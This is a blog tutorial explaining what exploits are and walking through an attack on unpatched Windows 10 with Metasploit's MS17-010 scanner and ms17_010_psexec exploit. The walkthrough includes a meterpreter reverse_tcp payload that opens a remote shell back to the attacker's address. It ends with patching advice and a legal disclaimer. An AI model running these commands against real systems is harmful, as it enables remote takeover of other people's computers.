Dear readers of Tecnogalaxy, today we will talk about the exploit MS17_PSEXEC that will allow us to hack Windows 10, obviously if the system to test does not have this patch installed.

As always, the advice I give is to keep your operating systems up to date, whether they be PC, server or device.

This type of exploit is dangerous, those who implement it could take possession of the system that is being attacked.

What are exploits?

Exploits are a subset of malware; They are defined as malicious programs that contain data or codes that can be executed by exploiting one or more vulnerabilities of software on a local computer or remotely.

Imagine that our browser contains a vulnerability that allows you to execute “arbitrary code” (allows you to install and start a malicious program) without your knowledge.

Often the first step of cybercriminals is to gain more and more permissions on the system to take control of it.

There is another problem that are exploits of vulnerabilities still unknown, discovered and used by cybercriminals, called in technical jargon zero-day vulnerabilities (or 0-day).

It often takes time for vendors to notice the problem and release a patch to fix it. Cybercriminals often prefer exploits to other methods of infection such as social engineering, because they lead practically to safe outcomes.

There are two cases where users could be hired by exploits, the first one visiting an Internet site that contains a malicious exploit code, the second one opening a seemingly legitimate file that hides the malicious code inside. (Spam or phishing emails in most cases contain exploits).

Unfortunately, the exploits are also a threat to more diligent users who worry about always updating the software, this because the gap in time between the discovery of the vulnerability and the release of the patch is not always immediate.

As you can imagine during this phase of time, the exploits act by threatening the security of almost all Internet users. Unfortunately, operating systems are not updated in many cases because this requires a halt in activities, and several system managers underestimate this danger.

Kaspersky Internet Security, and other Kaspersky Lab products, have onboard technology of automatic prevention of exploits, this technology uses all the information on the behaviours of the most known exploits.

These malware behaviours help these apps prevent infections even in the case of exploits that exploit unknown zero-day vulnerabilities.

Let’s start the test!

Hack Windows 10

As always, we use our dear friend Kali Linux.

Follow this commang for hack Windows 10. We launch the powerful msfconsole and open a shell writing the following command:

msfconsole

Look for the exploit to use:

search ms17

Now we have to tell msfconsole what to use:

use auxiliary/scanner/smb/smb_ms17_010
set RHOST S “l’ip della macchina da testare”
run

If the machine is vulnerable, we will see this message:

How to hack Windows 10

We open another Metasploit shell and write:

use exploit/windows/smb/ms17_010_psexec
set RHOSTS "L'ip della macchina testare"
set payload windows/meterpreter/reverse_tcp
set LHOST "Il nostro indirizzo ip"
exploit

If everything has gone well, we will see this message:

How to hack Windows 10

How to defend yourself

Keep your operating system up to date with all the patches released by the manufacturer and always monitor the progress of your machine.

As always make good use of them by doing tests on your device/computer, making them on device/computer not your own is illegal.

To the next article!

N.B.: I do not assume any responsibility for the use you make of the guide, as it is written for didactic and formative use.

Read also:

Was this article helpful to you? Help this site to keep the various expenses with a donation to your liking by clicking on this link. Thank you!

Follow us also on Telegram by clicking on this link to stay updated on the latest articles and news about the site.

If you want to ask questions or talk about technology you can join our Telegram group by clicking on this link.

© Tecnogalaxy.org - It is forbidden to reproduce the content of this article.